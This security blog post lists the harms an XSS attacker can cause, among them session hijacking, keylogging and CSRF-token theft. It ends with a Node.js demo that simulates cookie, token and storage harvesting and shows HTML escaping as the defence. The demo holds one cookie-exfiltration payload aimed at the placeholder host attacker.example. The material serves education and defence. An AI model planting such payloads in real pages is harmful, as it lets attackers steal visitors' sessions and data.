What can an XSS attacker do?

Yasir Ansari
Feb 12, 2021 · 2 min read

Generally speaking, once an attacker manages to get a script executed through XSS, that script runs in the victim's browser with the full privileges of the vulnerable site's origin, so the attacker can do one or more of the following:

  • Ad-Jacking — Inject their own ads into the page to make money.
  • Click-Jacking — Create an invisible overlay so that the victim's clicks land on controls the attacker chooses, performing actions the victim never intended.
  • Session Hijacking — Cookies can be read by JavaScript through document.cookie unless they were set with the HttpOnly flag; a stolen session cookie lets the attacker impersonate the victim.
  • Content Spoofing — The script has full access to the page's DOM, so it can show, hide or rewrite any content (fake news, altered prices, bogus error messages).
  • Credential Harvesting — A convincing popup shown on the trusted site ("Your session has expired, please re-enter your password") sends whatever the victim types to the attacker.
  • Forced Downloads — So the victim isn't downloading a malicious "Flash Player update" from an unknown domain? No problem: the script can trigger the download from the trusted website the victim is already visiting.
  • Crypto Mining — Use the victim's CPU to mine cryptocurrency.
  • Bypassing CSRF protection — Because the script runs same-origin, it can read the anti-CSRF token embedded in the page and submit it with forged state-changing requests on the victim's behalf.
  • Keylogging — Attach keyboard event handlers and send every keystroke to the attacker.
  • Recording Audio, Taking pictures, Geo-location — Camera, microphone and location access require the user to accept a permission prompt, but that prompt appears under the trusted site's name. Thanks to HTML5 APIs and JavaScript.
  • Stealing HTML5 web storage data — A website can store data in the browser for later use and, of course, JavaScript can read all of it via window.localStorage and window.sessionStorage (note these are properties, not functions).
  • Fingerprinting — It is very easy to find the browser name, version, installed plugins and their versions, the operating system, architecture, system time, language and screen resolution.
  • Network Scanning — The victim's browser can be abused to scan hosts and ports on the victim's internal network with JavaScript.
  • Crashing Browsers — Why not?! :-)
  • Stealing Information — Grab information from the web page and send it to the attacker's server.
  • Redirecting — Send the victim to any URL, for example a phishing page.
  • Tabnabbing — A sneakier version of redirection: when no keyboard or mouse events have been received for more than a minute, the user is probably away from the keyboard, and the script can quietly replace the current page with a fake one (a login page, for instance).
  • Capturing Screenshots — Thanks to HTML5 again, a page can be rendered into a canvas and the image exfiltrated. Blind XSS detection tools have been doing this before it was cool.
  • Perform Actions — The script controls the browser session, so it can do anything the victim could do on the site.

Not all is lost, cross-site scripting can be prevented!
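The mechanics behind a few of the items above (session hijacking, CSRF-token harvesting, web-storage theft) and the basic fix (HTML-encoding untrusted output), as an added example that is not part of the original post. It is plain Node.js, so the browser state an injected script would normally read (cookies, page HTML, localStorage) is constructed inline; the attacker domain, cookie names, token field name and sample values are all made up for illustration.

```javascript
// Added example (not from the original post): what an injected script can and
// cannot reach, simulated in plain Node.js. All data below is constructed.

// --- Constructed browser state standing in for the victim's session --------------
const SET_COOKIE_HEADERS = [
  "session=9f8e7d6c; Path=/; Secure; HttpOnly", // HttpOnly: hidden from script
  "theme=dark; Path=/",                          // readable by script
  "csrftoken=abc123; Path=/; SameSite=Lax",      // readable by script (no HttpOnly)
];

const PAGE_HTML = `
<form method="POST" action="/account/email">
  <input type="hidden" name="_csrf" value="t0k3n-from-the-page">
  <input type="email" name="email">
</form>`;

const LOCAL_STORAGE = { authToken: "eyJhbGciOi...", lastPage: "/dashboard" };

// 1. Session hijacking: document.cookie only exposes cookies set without HttpOnly.
//    This models the browser's filtering; a real payload would just read document.cookie.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter(h => !/;\s*httponly\b/i.test(h))
    .map(h => h.split(";")[0].trim());
}

// 2. CSRF bypass: the script runs same-origin, so it can read the anti-CSRF token
//    the page embeds and attach it to a forged POST. Field name "_csrf" is assumed.
function harvestCsrfToken(html, fieldName = "_csrf") {
  const re = new RegExp(`<input[^>]*name="${fieldName}"[^>]*value="([^"]*)"`, "i");
  const m = html.match(re);
  return m ? m[1] : null;
}

// 3. Web storage theft: every key in localStorage/sessionStorage is readable.
function dumpStorage(storage) {
  return Object.entries(storage).map(([k, v]) => `${k}=${v}`).join("&");
}

// 4. Prevention: HTML-encode untrusted data before it lands in an HTML context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Vulnerable rendering (string concatenation) beside the hardened form.
function renderCommentUnsafe(text) { return `<p class="comment">${text}</p>`; }
function renderCommentSafe(text) { return `<p class="comment">${escapeHtml(text)}</p>`; }

// Does the rendered markup still contain an executable script element?
function containsScriptTag(html) { return /<script\b/i.test(html); }

// A classic exfiltration payload (attacker.example is a placeholder domain).
const PAYLOAD = `<script>fetch("https://attacker.example/?c=" + document.cookie)</script>`;

// Stand-alone demo.
console.log("script-visible cookies:", scriptVisibleCookies(SET_COOKIE_HEADERS));
console.log("harvested CSRF token:  ", harvestCsrfToken(PAGE_HTML));
console.log("localStorage dump:     ", dumpStorage(LOCAL_STORAGE));
console.log("unsafe render executes:", containsScriptTag(renderCommentUnsafe(PAYLOAD)));
console.log("safe render executes:  ", containsScriptTag(renderCommentSafe(PAYLOAD)));
```

Run it with `node` and note that the session cookie never shows up in the first line: that is exactly what HttpOnly buys you, and it is why the cookie-stealing payload above is far less useful against a site that sets the flag. Output encoding at the point of rendering, as in `renderCommentSafe`, is what stops the payload from executing in the first place.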


Yasir Ansari

An independent information security researcher and consultant.